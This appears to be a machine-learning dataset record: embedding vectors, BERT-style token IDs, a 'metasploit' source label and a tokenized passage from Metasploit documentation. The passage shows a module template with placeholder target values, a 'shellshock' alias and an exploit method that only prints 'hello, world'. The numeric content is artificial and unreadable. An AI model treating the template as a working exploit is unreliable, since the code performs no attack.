0.25337153673171997, -0.5024053454399109, 1.147851586341858, 0.5776500701904297, -0.2700522541999817, -0.7299062609672546, -0.2586330771446228, 0.6897784471511841, 0.26706188917160034, -0.6258698105812073, -0.6765976548194885, -0.40223756432533264, 0.2832206189632416, -0.59443598985672, -0.2514782249927521, 0.2492745816707611, 0.08572492748498917, -0.17796988785266876, 0.27648982405662537, -0.36640700697898865, -0.1187911108136177, -1.0488017797470093, -0.09279080480337143, -0.8500124216079712, -0.17005611956119537, -0.7579469680786133, -0.16961543262004852, 0.3984470069408417, -0.0696704313158989, 0.6702905893325806, -0.19630976021289825, -0.5809716582298279, -0.041303690522909164, -0.29428067803382874, 0.23926088213920593, 0.045283976942300797, 0.010607380419969559, -0.8356963396072388, -0.012087561190128326, -0.19884352385997772, 0.5157333016395569, -0.1374872624874115, -0.17799104750156403, -0.3940477669239044, 0.05488448962569237, 0.24946102499961853, 0.5022334456443787, 1.1385475397109985, -0.22034741938114166, -0.042341623455286026, -0.7151430249214172, -0.014851086772978306, -0.15420787036418915, 0.1722162812948227, -0.39878717064857483, -0.3076731860637665, 0.6924067735671997, -0.5933210253715515, 0.06921475380659103, 0.4967648983001709, 0.681751549243927, -0.7413230538368225, 0.19372035562992096, -0.47822850942611694, 0.4320499002933502, -0.8567854762077332, 0.21103177964687347, 0.16116902232170105, 0.011354133486747742, 0.5832721590995789, -0.49561259150505066, -0.39906129240989685, 0.11602754890918732, 0.2698146104812622, -0.7055819630622864, 0.018966510891914368, 0.6736807823181152, 0.6272215843200684, -1.1376413106918335, 0.7040614485740662, -0.6631643772125244, -0.28053802251815796, -0.7638869881629944, 0.37878042459487915, 0.5173227190971375, 0.38184410333633423, 0.46393099427223206, -0.5341911315917969, -0.029987439513206482, 0.3101057708263397, -0.08620768040418625, 0.11963631212711334, -0.4296557903289795, 0.2717597186565399, 0.2325158268213272, -0.5979925990104675, 0.46180611848831177, 0.08469688147306442, -0.12540385127067566, -0.5587447285652161, -0.41433003544807434, 0.023990457877516747, 0.1683373749256134, 0.5974416136741638, 0.6731734275817871, 0.04880690202116966, 0.761853039264679, -0.32355740666389465, -0.10737917572259903, 0.5702497363090515, -0.009561008773744106, 0.1603812873363495, 0.15339182317256927, -0.22968459129333496, -0.10363435000181198, -0.7571020126342773, -0.44995588064193726, -0.5009638667106628, 0.4777895212173462, 0.062497299164533615, -0.7610716223716736, 1.0741478204727173, 0.1717698723077774, -0.4923877418041229, 0.3623267114162445, -0.4793024957180023, -0.5204565525054932, 0.9247702956199646, 0.12231623381376266, 0.8033323287963867, 0.20853568613529205, -0.07871602475643158, 0.2934974431991577, -0.10559269040822983, 0.06705494225025177, -0.2487362176179886, 0.14964666962623596, -0.4312608540058136, -0.8875545859336853, 0.2192997932434082, -0.226144939661026, 0.17940400540828705, -0.623995304107666, 0.1715121865272522, -0.6281237006187439, -0.15006102621555328, -0.6025493144989014, 0.7213679552078247, 0.6509721875190735, 0.590232789516449, 0.5117640495300293, 0.12284034490585327, 0.30614811182022095, -0.7138398289680481, 0.12996582686901093, 0.022920910269021988, 0.12921784818172455, -0.5118788480758667, 0.8476148247718811, -0.016438014805316925, -0.26948821544647217, -0.4004656970500946, 0.12900079786777496, -0.6520450711250305, 0.3602316081523895, 0.0029274746775627136, -0.19562573730945587, -0.15820029377937317, -0.7317573428153992, -0.12004569917917252, 0.13891498744487762, -0.36887815594673157, -0.20701903104782104, -0.31909260153770447, 0.7831662893295288, 0.51009202003479, -1.094271183013916, 0.2250557392835617, -0.8024746179580688, 0.032533854246139526, 0.4165809452533722, -0.6996429562568665, -0.17166142165660858, -0.7026655673980713, -0.07473476976156235, -0.5954410433769226, -0.15934956073760986, -0.015411699190735817, -0.06756924837827682, 0.12531901895999908, -1.2529783248901367, 0.37751927971839905, 0.026256632059812546, -0.503741979598999, -0.5199193358421326, -0.4977019131183624, 0.5028426647186279, 0.38608187437057495, 0.4646453261375427, -0.4882480204105377, -1.118309497833252, -0.2827107608318329, -0.8658866882324219, 0.5636316537857056, -0.4461466670036316, 0.3469249904155731, 0.9207327365875244, 0.2179519087076187, -0.4916059672832489, 0.463624507188797, -0.35093504190444946, -0.08171164244413376, -0.3615123927593231, -0.014035491272807121, -0.4162420928478241, 0.17666564881801605, 0.7570755481719971, -0.017335081472992897, -0.5954734086990356, 0.7117342948913574, 0.29380548000335693, -0.5664556622505188, -0.1507987678050995, 0.1368458867073059, -0.4805490970611572, 0.4443422555923462, -1.0183264017105103, 0.5629194378852844, 0.6696165800094604, -0.21093064546585083, 0.26481160521507263, -0.5605365633964539, 0.6664984822273254, 0.4480816125869751, -0.033906687051057816, -1.1835849285125732, -0.3065243661403656, -0.3184368312358856, 0.41984978318214417, -0.38200780749320984, 0.1959148794412613, -0.13334132730960846, -0.5494269132614136, -0.15662868320941925, 0.044726524502038956, -0.38918396830558777, -1.1642473936080933, -0.19523003697395325, -0.125227153301239, -0.19062764942646027, -0.391544908285141, 0.13960115611553192, -0.10200764238834381, -0.7506312131881714, 0.14292262494564056, -0.4341602325439453, -0.06666898727416992, -1.0270919799804688, -0.08426499366760254, -0.3071516454219818, 0.08827345073223114, -0.22830943763256073, 0.15017998218536377, -0.5637733936309814, 0.8366662263870239, 0.0487191304564476, -0.23320302367210388, 0.6038062572479248, 0.08949117362499237, 0.04127908870577812, 0.7428893446922302, 0.8265409469604492, -0.8443631529808044, -0.0394337959587574, 0.2669052183628082, -0.34841904044151306, 0.0017447664868086576, -0.525324821472168, -0.9298491477966309, -0.7946991324424744, -0.8982273936271667, 0.03896816447377205, -0.3208530843257904, 0.3902704119682312, -0.8014998435974121, 0.40386587381362915, -0.758429765701294, 0.2872007191181183, -0.0120373060926795, -0.7268853187561035, 0.15311214327812195, 0.18116366863250732, -0.01582547277212143, 0.1864129602909088, -0.6555769443511963, 0.1271403729915619, -0.8790749907493591, -0.38089653849601746, 0.5858631730079651, -0.1300017535686493, 0.2323165386915207, -0.34467005729675293, 0.18531380593776703, 0.03587678074836731, 0.10721012204885483, -0.3492249846458435, -0.16987930238246918, -0.4537075161933899, 0.37445810437202454, 0.07992333173751831, 0.5423632264137268, -0.440376877784729, 0.7469147443771362, -0.6810157895088196, 0.7468342781066895, 0.33013004064559937, -0.39332905411720276, 0.3022276759147644, 0.05809669569134712, 1.000928282737732, -0.1668069064617157, -0.27049344778060913, 0.12821345031261444, 0.2985689342021942, 0.2776654362678528, -0.4011060297489166, -0.17588326334953308, 0.2065540999174118, -0.8219082951545715, -0.7473833560943604, 0.3138849437236786, 0.08657094836235046, -0.2470145970582962, 0.4011744260787964, -0.07609569281339645, 0.5554155707359314, -0.045796770602464676, 0.772170901298523, 0.6651630997657776, 0.46094053983688354, 0.12207946926355362, -0.3966358006000519, 0.11690413951873779, 0.6470776796340942, 0.34509527683258057, 0.29761090874671936, 0.1835867166519165, -0.4611254036426544, 0.22480690479278564, -0.12005137652158737, -0.02522047609090805, -0.8432163596153259, -0.41115275025367737, 1.0255624055862427, -0.02446805126965046, 0.2696654200553894, -0.5628297924995422, -1.23604416847229, -0.3608618378639221, 0.31058117747306824, -0.49432942271232605, -0.5900723338127136, 0.5105486512184143, 0.00018700155487749726, 0.2865498960018158, -0.9343482851982117, -0.13648857176303864, -0.5522276759147644, 0.3869963586330414, 0.3424697816371918, 0.0008821289520710707, -0.3459058105945587, 0.7641216516494751, 0.17386919260025024, -0.8924828171730042, -0.42438599467277527, -0.7657265663146973, -0.6443794965744019, -0.15377512574195862, -0.7267496585845947, -0.9821586608886719, 0.32874760031700134, 0.4075739085674286, -0.09734690934419632, 0.44090577960014343, 0.0007201516418717802, 0.31581687927246094, -0.7012627720832825, -0.18926191329956055, -0.050676826387643814, 0.639758825302124, 0.47827577590942383, -0.22216786444187164, -0.2998906373977661, -0.7566429972648621, -0.2414018213748932, -0.12482224404811859, -0.4566538333892822, 1.3413342237472534, -0.1990184485912323, -0.19764477014541626, -0.17299909889698029, 0.33812984824180603, 0.8314559459686279, -0.1433093249797821, 0.18378864228725433, 1.06388258934021, 0.31188711524009705, -0.5815614461898804, -0.35229822993278503, -0.15428850054740906, 0.041829295456409454, 0.6167882084846497, 0.06470847129821777, -0.343885213136673, 0.07727720588445663, -0.1821615993976593, -0.20442664623260498, -0.7778798937797546, -0.8852243423461914, -1.3156309127807617, -0.221967875957489, -0.04552840068936348, -0.011355211958289146, 0.14129459857940674, -0.38129350543022156, 0.09098286926746368, -0.1928698569536209, -0.7555351853370667, 0.007214274723082781, -0.5991064310073853, -0.031395893543958664, -0.05065992474555969, 0.48069891333580017, -1.1219336986541748, -0.901756227016449, -0.19709618389606476, -0.6361964344978333, -0.4933125078678131, -1.0623539686203003, 0.06253093481063843, 0.37996143102645874, -0.7202423810958862, 0.6698939204216003, -0.7913868427276611, 0.1401505321264267, -0.1591406911611557, -0.6179903745651245, 0.42368146777153015, 0.35401275753974915, -0.8003866076469421, 0.5595157146453857, -0.4778345823287964, 0.3522154986858368, 0.2897891104221344, -0.5757660269737244, -0.42173901200294495, 0.7183659672737122, 0.09244872629642487, 0.11939642578363419, 0.08790267258882523, -1.006302833557129, 0.6789283752441406, -0.3986441493034363, -0.7098172903060913, -0.375871866941452, -0.033330515027046204, -0.07579558342695236, 0.8091617822647095, -0.19516706466674805, -0.3538345992565155, 1.060254454612732, 0.8947702050209045, 0.04703894257545471, -0.49926552176475525, 0.7311177253723145, 0.751222550868988, -0.039619330316782, 0.17959418892860413, 0.6386183500289917, 0.1935909539461136, -0.6542252898216248, 0.3120260536670685, 0.4572068154811859, -0.7198461890220642, 0.7973873019218445, 0.1220044493675232, 0.12562879920005798, -0.48573407530784607, -0.7709777355194092, 0.2515970468521118, 0.6655872464179993, -0.034263115376234055, -0.03582581505179405, 0.16270354390144348, -0.0034824649337679148, -0.5905281901359558, -0.08270445466041565, -0.8856043219566345, 0.20668618381023407, 0.531609058380127, -0.5697075724601746, 0.2971545159816742, -0.35714730620384216, -0.46853938698768616, 0.0883922204375267, -0.16710667312145233, 0.5137887597084045, 0.1449349820613861, 0.10183847695589066, 0.10054858028888702, 0.8946478962898254, -0.9143803715705872, -0.22829128801822662, -0.059892456978559494, 0.3192615807056427, -0.36697834730148315, -0.7338755130767822, 0.2739889621734619, 1.5480141639709473, 0.053328920155763626, -0.3451386094093323, -0.22780358791351318, -0.0973806157708168, 0.2114337682723999, -0.15591518580913544, -0.3155783712863922, 0.3590155243873596, -0.13868851959705353, 0.02155722863972187, -0.31112733483314514, -0.3652171194553375, -0.13345681130886078, -0.11059653759002686, 0.5864550471305847, -0.034968677908182144, -0.8481016755104065, 0.5648563504219055, -0.2611827552318573, 0.11993272602558136, 0.6886633634567261, 0.8523917198181152, 0.44556015729904175, -1.0711722373962402, 0.26468050479888916, -0.11573546379804611, 0.3835090696811676, 0.5169475078582764, 0.12621252238750458, -0.14506366848945618, 0.3423185348510742, 0.8694909811019897, -0.8628630042076111, -0.4160493016242981, 0.814788818359375, 0.08255668729543686, -0.8023240566253662, -0.16575193405151367, -0.4183158278465271, 0.29790520668029785, -0.030567007139325142, -0.21132615208625793, 0.49596109986305237, 0.20452412962913513, 0.06151628866791725, 0.20781204104423523, 0.25155365467071533, 0.5680190920829773, -0.5797345042228699, 0.3214363157749176, -0.29023945331573486, -0.050977520644664764, 0.34703972935676575, 0.3192203640937805, -0.6851052641868591, 0.21171815693378448, 1.3314558267593384, 0.366781085729599, -0.6476123332977295, 0.1754486858844757, 0.1219857707619667, -0.07174007594585419, 0.06598295271396637, 0.5649780631065369, -0.18218880891799927, 0.8230348229408264, 0.319119930267334, -0.7060755491256714, -0.12964050471782684, 0.9713824987411499, -0.15667879581451416, 0.09761611372232437, -0.04394146427512169, -0.07027926295995712, 0.3502163290977478, -0.5948391556739807, 0.5225561261177063, -0.18592405319213867, 0.07790538668632507, 0.20318615436553955, -0.9684834480285645, -0.6444532871246338, 0.9396827816963196, 0.4693993330001831, 0.4404360353946686, 0.4674936532974243, 0.9995856285095215, -0.43201398849487305, -0.051668930798769, 0.08013485372066498, -0.38831979036331177, -0.11476948857307434, 0.26998403668403625, 0.1826534867286682, -0.41088709235191345, -0.3321840763092041, -0.20355106890201569, 0.7770600318908691, 0.009933569468557835, -0.21151873469352722, -0.24094869196414948, 0.38736048340797424, -0.5056353807449341, -0.43982890248298645, 0.14323940873146057, 0.03841150552034378, -0.5860838294029236, -0.4992280602455139, -0.006317957304418087, 0.7467178702354431, 1.4582059383392334, 0.33905667066574097, -1.1981844902038574, -0.4941037595272064, -0.34685635566711426, -0.2046157419681549, 0.9133585095405579, -0.2945847809314728, -0.2251662313938141, 0.41647791862487793, -1.4939754009246826, -0.17965388298034668, 0.031122954562306404, -0.24254806339740753, -0.1429385244846344, 0.47979414463043213, 0.07776745408773422, 0.97353196144104, 0.28318315744400024, -0.5317349433898926, -0.27107569575309753, 0.39632245898246765, 0.9113969802856445, 0.04905003681778908, 0.8711211681365967, 0.08931946009397507, 0.5627565383911133, 0.5647091865539551, -0.6973605155944824, 1.1888585090637207, 0.2417925000190735, 0.24926482141017914, 0.12201785296201706, -0.228109672665596, -0.592523992061615, -0.5608892440795898, 0.6299245953559875, -0.01813734509050846, -0.05830632522702217, 0.21824559569358826, -0.6020727753639221, -0.12526202201843262, -0.6612310409545898, -0.3780874013900757, -0.36696353554725647, 0.008271275088191032, -0.013953074812889099, 0.029005354270339012, 0.6250258684158325, -1.2421855926513672, 4.286182880401611, 0.9233824610710144, 0.08801131695508957, -0.012871607206761837, 0.3102782368659973, 0.6710769534111023, 0.8089177012443542, -0.45924264192581177, 0.317131370306015, -0.7745042443275452, 0.549501359462738, -0.40938258171081543, 0.7595444917678833, 0.9730161428451538, 0.9177740216255188, 0.5423193573951721, -0.563273549079895, -0.36159592866897583, 0.3232899308204651, -0.247425839304924, -1.038143277168274, -0.2917552590370178, -0.5851047039031982, 0.6020864248275757, 0.29625317454338074, 0.12492892146110535, -0.4887322783470154, -0.7305501103401184, 0.3565960228443146, -0.07635826617479324, -0.2760072648525238, -0.3960706293582916, 0.3768668472766876, -0.25877925753593445, -0.46065640449523926, -0.23007512092590332, -0.27562662959098816, -0.9936022758483887, -0.4827941656112671, 0.17593297362327576, 0.42400556802749634, -0.28329703211784363, 0.4306562542915344, -0.18265506625175476, 0.4960680305957794, 0.696410596370697, -0.8482226729393005, 0.46738648414611816, 0.5600513815879822, -1.0382457971572876, 0.9352260231971741, -0.1694498211145401, 0.57526695728302, 0.003305531805381179, -0.8297850489616394, 0.881842851638794, 0.257181316614151, -0.5219663381576538, -0.29165172576904297, -0.17283420264720917, 0.40501847863197327, -0.7437536120414734, -0.2409910410642624, -0.11841557919979095, -0.1834196150302887, 0.6110950112342834, -0.1744784265756607, 0.08784447610378265, -0.08913713693618774, 0.0846550241112709, -0.2464960366487503, -0.04280735179781914, -0.17590315639972687, -0.054358355700969696, 0.770351767539978, 0.39833882451057434, -0.06703250110149384, -0.11300689727067947, 0.6962305307388306, -0.23880550265312195, -0.32026660442352295, -0.7208321690559387, -1.3228431940078735, 0.3696523904800415, 0.35946086049079895, 0.2169262170791626, -0.39609792828559875, -0.6693431735038757, -0.004695390351116657, 0.12455891072750092, 0.7207209467887878, 0.31971848011016846, -0.14112673699855804, 0.4050901234149933, 0.6455766558647156 ]
[ 101, 2006, 2023, 3931, 9863, 1997, 3569, 4431, 8909, 4765, 28295, 16044, 2742, 1997, 7604, 1999, 1037, 11336, 2050, 4431, 1999, 1037, 18804, 13102, 4135, 4183, 11336, 2003, 1037, 3120, 1997, 2592, 3141, 2000, 1996, 11336, 1012, 2023, 2064, 2022, 1037, 4957, 2000, 1996, 18130, 7319, 1010, 1037, 2739, 3720, 1010, 1037, 9927, 2695, 2055, 1037, 3563, 6028, 1996, 11336, 3594, 1010, 1037, 3563, 1056, 28394, 2102, 1010, 4385, 1012, 1996, 2062, 2017, 2031, 1996, 2488, 1012, 2174, 1010, 2017, 2323, 2025, 2224, 2023, 2004, 1037, 2433, 1997, 15147, 1012, 2862, 1997, 3569, 4431, 8909, 4765, 28295, 9821, 8162, 3401, 16044, 2742, 2278, 3726, 2278, 7178, 12928, 12146, 1012, 4012, 1031, 1005, 26226, 2063, 1005, 1010, 1005, 2297, 1011, 25897, 2683, 1005, 1033, 19296, 8586, 8545, 1012, 10210, 2890, 1012, 8917, 1031, 1005, 19296, 2063, 1005, 1010, 1005, 3938, 1005, 1033, 20723, 8586, 25137, 14876, 7874, 1012, 4012, 1031, 1005, 7226, 1005, 1010, 1005, 13138, 2549, 1005, 1033, 5796, 19279, 15937, 7159, 1012, 7513, 1012, 4012, 1031, 1005, 5796, 2497, 1005, 1010, 1005, 5796, 17134, 1011, 5709, 2629, 1005, 1033, 3968, 4783, 2595, 24759, 28100, 1011, 16962, 1012, 4012, 1031, 1005, 3968, 2497, 1005, 1010, 1005, 14506, 2581, 1005, 1033, 2149, 1011, 8292, 5339, 1011, 24728, 2243, 2497, 1012, 8292, 5339, 1012, 8917, 1031, 1005, 2149, 1011, 8292, 5339, 1011, 24728, 1005, 1010, 1005, 5385, 14526, 2509, 1005, 1033, 1062, 4305, 6290, 13390, 25811, 29050, 6024, 1012, 4012, 1031, 1005, 1062, 4305, 1005, 1010, 1005, 2184, 1011, 13138, 1005, 1033, 1059, 2361, 16872, 2497, 2860, 2361, 19722, 19666, 18939, 1012, 4012, 1031, 1005, 1059, 2361, 16872, 2497, 1005, 1010, 1005, 6146, 16068, 1005, 1033, 23730, 20654, 23947, 8454, 20654, 3366, 10841, 15780, 1012, 4012, 1031, 1005, 23730, 20654, 1005, 1010, 1005, 14078, 2581, 17465, 1005, 1033, 24471, 5802, 22123, 12053, 1031, 1005, 24471, 2140, 1005, 1010, 1005, 8299, 1024, 1013, 1013, 2742, 1012, 4012, 1013, 9927, 1012, 25718, 1029, 8909, 1027, 13138, 1005, 1033, 9875, 1006, 2139, 28139, 12921, 1008, 1007, 2505, 1031, 1005, 9875, 1005, 1010, 1005, 10986, 6806, 3600, 1005, 1033, 2204, 2000, 2113, 9875, 3415, 2005, 14184, 2024, 2053, 2936, 8250, 2004, 1037, 4431, 8909, 4765, 18095, 1010, 2021, 2738, 1999, 1996, 3964, 27425, 2492, 2004, 3491, 1999, 1996, 2742, 2917, 1012, 3642, 2742, 1997, 7604, 1999, 1037, 11336, 26266, 18804, 13102, 4135, 4183, 5302, 8566, 2571, 1026, 5796, 2546, 1024, 1024, 18077, 1024, 1024, 6556, 4635, 1027, 3671, 26763, 2075, 13366, 3988, 4697, 1006, 18558, 1027, 1063, 1065, 1007, 3565, 1006, 10651, 1035, 18558, 1006, 18558, 1010, 1005, 2171, 1005, 1027, 1028, 1005, 3642, 2742, 1005, 1010, 1005, 6412, 1005, 1027, 1028, 1003, 1053, 1063, 2023, 2003, 2019, 2742, 1997, 1037, 11336, 2478, 7604, 1065, 1010, 1005, 6105, 1005, 1027, 1028, 5796, 2546, 1035, 6105, 1010, 1005, 3166, 1005, 1027, 1028, 1031, 1005, 4242, 1005, 1033, 1010, 1005, 7604, 1005, 1027, 1028, 1031, 1031, 1005, 26226, 2063, 1005, 1010, 1005, 2297, 1011, 25897, 2683, 1005, 1033, 1010, 1031, 1005, 7226, 1005, 1010, 1005, 13138, 2549, 1005, 1033, 1010, 1031, 1005, 24471, 2140, 1005, 1010, 1005, 8299, 1024, 1013 ]
metasploit
117.txt
0
/ example. com / blog. php? id = 123'] ],'platform'= >'win ','targets'= > [ ['example ', {'ret'= > 0x41414141 } ] ],'payload'= > {'badchars'= > " \ x00 " },'privileged'= > false,'disclosuredate'= >'2014 - 04 - 01 ','defaulttarget'= > 0,'notes'= > {'aka'= > ['shellshock'] } ) ) end def exploit print _ debug ('hello, world') end end [SEP]
[ -0.5802825689315796, 0.16952532529830933, 0.17288951575756073, 0.2824123799800873, -0.7284773588180542, -0.6982141137123108, -0.31621113419532776, 0.5898265242576599, 0.5582739114761353, 1.0491783618927002, 0.7652196884155273, 0.40331077575683594, 0.7637196183204651, 0.20066531002521515, -0.867138683795929, 0.22145137190818787, 0.48317795991897583, -0.36489540338516235, -0.7259536385536194, 0.573315441608429, 0.06968394666910172, 0.012164042331278324, -1.3310352563858032, 0.35451897978782654, -0.4891784191131592, 0.8359616994857788, 0.2575906813144684, -0.6865221261978149, 0.7327777147293091, 0.9464369416236877, -0.23051977157592773, -0.07795392721891403, -0.1276800036430359, -1.5154409408569336, 0.08198892325162888, -0.23983627557754517, 1.0756251811981201, -0.7925228476524353, -0.39308956265449524, -0.48246514797210693, -0.07731010764837265, 0.28735730051994324, 0.4105738699436188, -0.08718981593847275, -0.8627387881278992, -0.5000801682472229, -0.19761139154434204, 0.17389525473117828, 0.0730610191822052, -0.22013340890407562, 0.38908880949020386, 0.24583202600479126, 0.7670770883560181, 0.4525400400161743, -0.3146319091320038, 0.03555872663855553, -0.650020956993103, -0.7475807070732117, -0.7606536746025085, 0.013652078807353973, 0.09382083266973495, 0.6937174797058105, 0.3900778293609619, -1.395729899406433, 0.0910901352763176, 0.16147245466709137, 0.16561374068260193, -0.5762715339660645, -0.03252844512462616, 0.0020932797342538834, -0.1899786740541458, 1.220441222190857, -0.4590880274772644, -0.5919139385223389, -0.6706176400184631, -0.523438572883606, -0.05830637365579605, -0.26709312200546265, -0.48799267411231995, 1.430975317955017, -0.38999632000923157, 0.7365125417709351, 0.6184501051902771, -0.5531092286109924, -0.5502077341079712, -0.46967214345932007, 0.5687147378921509, 0.4445222020149231, 0.020441699773073196, 0.05475059896707535, -0.24891090393066406, 0.3999062478542328, -0.3111721873283386, 0.06938918679952621, 0.03024657443165779, 0.7857391834259033, -0.4065517485141754, 0.36682209372520447, -0.6536526083946228, 0.13855016231536865, 0.8107105493545532, 0.5527442097663879, -0.6847125887870789, 0.5358790159225464, -0.5638722777366638, 0.32488495111465454, 0.9941416382789612, 0.15659530460834503, -1.040496587753296, -0.13252294063568115, 0.07193948328495026, 0.5928632616996765, -0.6840231418609619, -0.31772273778915405, -0.7078835368156433, -0.10608513653278351, -0.3501294255256653, 0.1383281648159027, -0.05182653293013573, -0.4326605796813965, 0.09010325372219086, -0.0003354461514391005, -0.278347909450531, -0.9074928164482117, -0.33846697211265564, -0.3630971610546112, -0.40567493438720703, 1.2103681564331055, -0.3769952654838562, -0.2383119761943817, -0.034193553030490875, 0.21740059554576874, 0.3098527193069458, 0.4770297408103943, -0.7372194528579712, 0.5952700972557068, -0.06320126354694366, 0.06786519289016724, 0.8998547792434692, -0.7570238709449768, -0.36929750442504883, -0.38449549674987793, -0.8353381156921387, 1.6633657217025757, 0.18605394661426544, 0.2708718478679657, 0.5347353219985962, -0.0005512875504791737, -0.14748549461364746, 0.5630710124969482, -0.34536176919937134, -0.5821709036827087, -0.05710605904459953, 0.5427238941192627, -0.46090593934059143, -0.139227956533432, -0.22932781279087067, 0.6824819445610046, -0.07211733609437943, 0.1273573637008667, 0.09206847101449966, 0.8135812878608704, -0.594744086265564, 1.3935165405273438, -0.7317084074020386, 0.8382347822189331, -1.032145380973816, -0.3049546778202057, -0.3368101418018341, -0.3265211284160614, 0.6476823091506958, -0.3918406665325165, -0.26214599609375, 0.6258574724197388, 0.7520606517791748, 0.13597291707992554, 0.19311413168907166, 0.059484340250492096, 0.9019502401351929, 0.4196743071079254, -0.6929864883422852, 0.7471982836723328, 0.2351769357919693, 0.5002424716949463, -0.058204129338264465, 0.2528062164783478, -0.32998400926589966, -0.09939312189817429, -0.7906152606010437, 0.12584523856639862, 1.3621634244918823, 0.5941128134727478, -1.3357478380203247, 0.02754310891032219, 0.6891956925392151, -0.339013010263443, -1.1153541803359985, 0.47275280952453613, -0.12684446573257446, -1.4309000968933105, -0.6503413915634155, 0.15508420765399933, -0.17385059595108032, 0.5875269770622253, 0.42019546031951904, -0.6272153854370117, 0.1028800904750824, 0.788791298866272, -0.43181154131889343, -0.3233019709587097, 0.6751368641853333, 0.0026156348176300526, -0.3932243883609772, -0.18888841569423676, 0.34818196296691895, -0.5112068057060242, -0.5585013031959534, 0.45974019169807434, 0.2700958251953125, 0.2100670337677002, -0.30550891160964966, 1.0310271978378296, 0.8909296989440918, 0.7603952288627625, 0.10623583197593689, -0.4809437692165375, -0.17289571464061737, 0.5484704375267029, -0.3136466443538666, 0.0743609368801117, 0.12301531434059143, 0.2939203977584839, 0.0004142669204156846, 0.4743572771549225, -0.03763376176357269, -0.12142626196146011, 1.204872727394104, 0.7527478337287903, 0.4334452450275421, 0.5626367330551147, -0.297801673412323, 0.8198292255401611, -0.32743263244628906, -0.14412590861320496, 0.3018817901611328, -0.09793562442064285, 0.6439608931541443, 0.2346002757549286, 0.5559831261634827, 0.7412824034690857, -0.6831944584846497, 1.0654488801956177, -0.076051265001297, 0.43728193640708923, -0.5379215478897095, -0.29974570870399475, -0.11099065095186234, 0.7776052355766296, -1.231449842453003, 0.04669680446386337, -0.09488748013973236, 0.30351465940475464, -0.18082349002361298, -0.34241074323654175, 0.5909141898155212, -0.25815802812576294, 0.21678383648395538, -0.029394278302788734, -0.35198143124580383, -0.43392807245254517, -0.3487563133239746, -0.42960309982299805, -0.7658898234367371, -0.19280995428562164, -0.56736159324646, -0.3178054988384247, 0.421230286359787, -0.6323806643486023, 0.11775664985179901, -0.9166469573974609, 0.3423759639263153, 0.9016549587249756, 0.2858566641807556, -0.04281212016940117, -0.05622274428606033, -0.1634409874677658, -0.5120300054550171, -0.31945565342903137, -0.13408833742141724, 0.8742778897285461, -0.8147757649421692, 0.30113622546195984, 0.8250745534896851, -0.5575245022773743, 0.08733817934989929, -0.005976307205855846, 0.2440885305404663, -0.04489176720380783, -0.16877231001853943, 0.020055552944540977, -1.0393959283828735, -0.017008574679493904, 0.24479974806308746, -0.46088847517967224, -0.8632146716117859, 0.7214597463607788, 0.5485543012619019, -0.28709688782691956, 0.5389134883880615, 0.7384346723556519, -0.17090155184268951, 0.7737746238708496, 0.3242904543876648, -0.2987286448478699, -1.3155479431152344, 1.481061577796936, 0.5481919050216675, 0.6156597137451172, -0.46354958415031433, -0.8820913434028625, -0.7927739024162292, -0.25712114572525024, -0.15553493797779083, -0.794370174407959, -0.46267545223236084, 0.7235755920410156, 0.4566153287887573, -1.335600733757019, 0.105046346783638, -1.0511887073516846, -0.09542902559041977, -0.096506267786026, -0.4111955165863037, 0.3866627514362335, 0.5835357308387756, 0.09820323437452316, -0.7896406650543213, -0.1304117888212204, -0.31869184970855713, 0.47565698623657227, 0.029059594497084618, -0.1693268120288849, 0.3866102695465088, 1.098362684249878, 0.1408657729625702, 0.3975639343261719, -0.107256680727005, -0.7017577290534973, -0.30205315351486206, 0.2515811622142792, 0.10473135858774185, -0.38756945729255676, 0.01015826128423214, 0.7128509879112244, 0.1282479465007782, 0.8724310994148254, -1.342720627784729, 0.08887014538049698, 0.31867069005966187, -0.0432361364364624, 0.07403333485126495, -0.0022241156548261642, -0.14614291489124298, -0.6583133935928345, 0.10064170509576797, -0.325297087430954, 0.10172092169523239, 0.6449370980262756, 0.46742716431617737, -0.40271326899528503, 0.4835081100463867, -0.552969217300415, -1.1954855918884277, -0.19737857580184937, -0.2761761546134949, -0.5832905769348145, 0.6484417915344238, 0.046403512358665466, 0.608057975769043, -0.17564517259597778, -0.012774843722581863, -0.0807454064488411, 0.5925726890563965, 1.2205113172531128, -0.3297539949417114, -0.012640043161809444, -0.26566967368125916, -1.064480185508728, -0.6426348090171814, 0.0874355137348175, -0.8410764336585999, 0.19285668432712555, 0.8256295919418335, -0.19489091634750366, -0.21270368993282318, -1.813793659210205, 0.6346470713615417, 0.8289942741394043, 0.8383557796478271, 0.5331895351409912, 0.40900108218193054, 0.044963471591472626, 0.34202489256858826, 0.3431490957736969, -0.07167522609233856, 0.2060294896364212, -1.1626813411712646, 1.0384920835494995, 0.46096789836883545, 0.5692392587661743, -0.2646102011203766, -0.23000803589820862, 0.05717574805021286, 0.2915937304496765, -0.47973474860191345, -0.13017712533473969, -0.2005757987499237, 0.29814425110816956, 0.014414094388484955, -0.7403446435928345, -0.5289807319641113, -0.7075731754302979, -1.1131869554519653, -0.007612669374793768, 0.6596309542655945, -0.5770875811576843, -0.18766698241233826, -0.6389688849449158, 0.23408082127571106, 0.6144890785217285, 0.3132733702659607, -0.10349835455417633, -0.9748567342758179, -1.0734540224075317, -1.3279322385787964, 0.06117783486843109, 0.9724816083908081, -0.05747146159410477, -0.02697875164449215, -1.5973703861236572, 0.3697017729282379, -0.09587790071964264, -0.05751807242631912, -0.09502740949392319, 0.060382433235645294, -0.2209705263376236, 0.27180519700050354, 0.49858957529067993, 0.09311112761497498, -0.38580575585365295, -0.13256770372390747, -1.3523664474487305, 0.25171923637390137, -1.0897289514541626, -0.31780004501342773, -0.20103001594543457, 0.30906710028648376, 0.17445656657218933, 0.01227753609418869, -0.033886898308992386, -0.12994344532489777, 0.24837931990623474, -0.016216449439525604, -0.7983720898628235, -0.4137566387653351, 0.8558809757232666, 0.12809495627880096, -1.0813943147659302, 0.8636584877967834, 0.003146342234686017, -0.10215770453214645, 0.32086092233657837, 0.3436562120914459, 0.38080132007598877, -0.2498096227645874, -0.4425140619277954, 0.14604823291301727, 0.1693747192621231, -0.4720178544521332, -0.12784653902053833, -1.3902416229248047, 0.9287216067314148, 0.05729015916585922, -0.4430880844593048, 0.051311250776052475, -1.120040774345398, 0.12428893148899078, 0.21276801824569702, -0.3396414816379547, 0.0792291909456253, -0.3291170597076416, -0.20304110646247864, -0.05310764163732529, -0.4991169273853302, -0.681664764881134, 0.7866908311843872, -0.3207697868347168, -0.5331059098243713, 0.7869295477867126, 0.4381038546562195, 0.4938671886920929, -0.2850090563297272, -0.6310427188873291, 0.27023839950561523, 0.13416755199432373, 0.03366510942578316, -0.22630052268505096, 